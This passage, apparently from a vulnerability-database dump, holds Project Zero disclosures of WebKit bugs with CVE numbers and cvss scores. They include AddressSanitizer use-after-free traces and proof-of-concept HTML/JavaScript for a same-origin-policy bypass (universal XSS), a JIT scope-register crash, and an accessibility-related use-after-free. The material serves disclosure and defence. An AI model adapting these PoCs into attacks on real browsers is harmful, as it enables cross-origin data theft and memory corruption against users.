(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #51 0x7fffd24b6cf0 in ReceiveNextEventCommon 
(/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n \r\n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)\r\nfreed by thread T0 here:\r\n #0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)\r\n #5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)\r\n #6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)\r\n #7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, 
JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), 
WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x10f544d2c in __sanitizer_mz_malloc 
(/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)\r\n #7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)\r\n #8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)\r\n #9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)\r\n #10 0x111e8aac9 in 
WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)\r\n #11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)\r\n #12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)\r\n #13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)\r\n #14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)\r\n #15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)\r\n #16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)\r\n #17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)\r\n #18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)\r\n #19 0x111eb842e in 
WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)\r\n #20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)\r\n #21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)\r\n #22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #28 0x10d001ba9 in 
WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const\r\nShadow bytes around the buggy address:\r\n 0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd\r\n 0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa\r\n 0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: 
cb\r\n==29516==ABORTING\r\n=================================================================\r\n-->\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28179", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-07-25T21:42:30", "description": "WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting. CVE-2017-7037. Webapps exploit for Multiple platform. Tags...", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42378", "href": "https://www.exploit-db.com/exploits/42378/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1240\r\n\r\nJSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. 
So JSDOMWindow::getPrototype, which checks the Same Origin Policy, is not called.\r\n\r\nThe PoC shows how to call a setter of another origin's object.\r\n\r\nPoC 1 - JSValue::putToPrimitive:\r\n-->\r\n\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = 1.2;\r\n a.__proto__.__proto__ = f.contentWindow;\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n\r\n</script>\r\n</body>\r\n\r\n<!--\r\nPoC 2 - JSObject::putInlineSlow:\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = {\r\n __proto__: f.contentWindow\r\n };\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n</script>\r\n</body>\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42378/"}, {"lastseen": "2017-07-25T21:42:21", "description": "WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling. CVE-2017-7018. 
Dos exploit for Multiple plat...", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7018"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42373", "href": "https://www.exploit-db.com/exploits/42373/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234\r\n\r\nHere's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).\r\n\r\nvoid flush(InlineStackEntry* inlineStackEntry)\r\n{\r\n\t...\r\n if (m_graph.needsScopeRegister())\r\n flush(m_codeBlock->scopeRegister()); <<--- (a)\r\n}\r\n\r\nAt (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.\r\n\r\nPoC:\r\n-->\r\n\r\nfunction f() {\r\n (function () {\r\n \teval('1');\r\n \tf();\r\n }());\r\n\r\n throw 1;\r\n}\r\n\r\nf();\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42373/"}, {"lastseen": "2017-07-24T19:42:20", "description": "WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free. CVE-2017-7046. Dos exploit for Multiple platform. Tags: Use After Free", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:42365", "href": "https://www.exploit-db.com/exploits/42365/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1246\r\n\r\nThere is a use-after-free security vulnerability in WebKit. 
The vulnerability was confirmed on an ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\nPoC:\r\n\r\n=================================================================\r\n-->\r\n\r\n<style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58\r\nREAD of size 4 at 0x608000090ac8 thread T0\r\n==30692==WARNING: invalid path to external symbolizer!\r\n==30692==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)\r\n #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) 
(/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #38 